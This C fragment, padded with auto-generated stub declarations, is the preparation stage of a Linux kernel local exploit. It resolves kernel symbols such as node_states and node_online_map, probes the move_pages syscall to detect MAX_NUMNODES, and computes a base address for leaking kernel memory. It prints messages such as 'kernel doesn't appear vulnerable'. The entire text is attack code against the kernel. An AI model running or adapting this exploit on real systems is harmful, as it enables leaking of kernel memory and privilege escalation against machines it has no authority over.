
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {scalar_t__ (* get_kernel_sym ) (char*) ;} ;


 scalar_t__ ENODEV ;
 scalar_t__ ENOSYS ;
 int MPOL_MF_MOVE ;
 int __NR_move_pages ;
 int buf ;
 scalar_t__ errno ;
 int exit (int) ;
 TYPE_1__* exp_state ;
 int fprintf (int ,char*,...) ;
 int malloc (int) ;
 int max_numnodes ;
 scalar_t__ node_online_map ;
 scalar_t__ node_states ;
 scalar_t__ our_base ;
 int stdout ;
 scalar_t__ stub1 (char*) ;
 scalar_t__ stub2 (char*) ;
 scalar_t__ stub3 (char*) ;
 int syscall (int ,int ,int,int *,int*,int*,int ) ;
 scalar_t__ totalhigh_pages ;

int prepare(unsigned char *ptr)
{
 int node;
 int found_gap = 0;
 int i;
 int ret;
 int status;

 totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages");
 node_states = exp_state->get_kernel_sym("node_states");
 node_online_map = exp_state->get_kernel_sym("node_online_map");

 buf = malloc(4096);





 for (i = 0; i < 512; i++) {
  node = i;
  ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
  if (errno == ENOSYS) {
   fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
   exit(1);
  } else if (errno == ENODEV) {
   found_gap = 1;
  } else if (found_gap == 1) {
   max_numnodes = i;
   fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes);
   break;
  }
 }

 if (node_online_map != 0)
  our_base = node_online_map;




 else if (node_states != 0)
  our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8)));
 else {
  fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n");
  exit(1);
 }

 return 0;
}
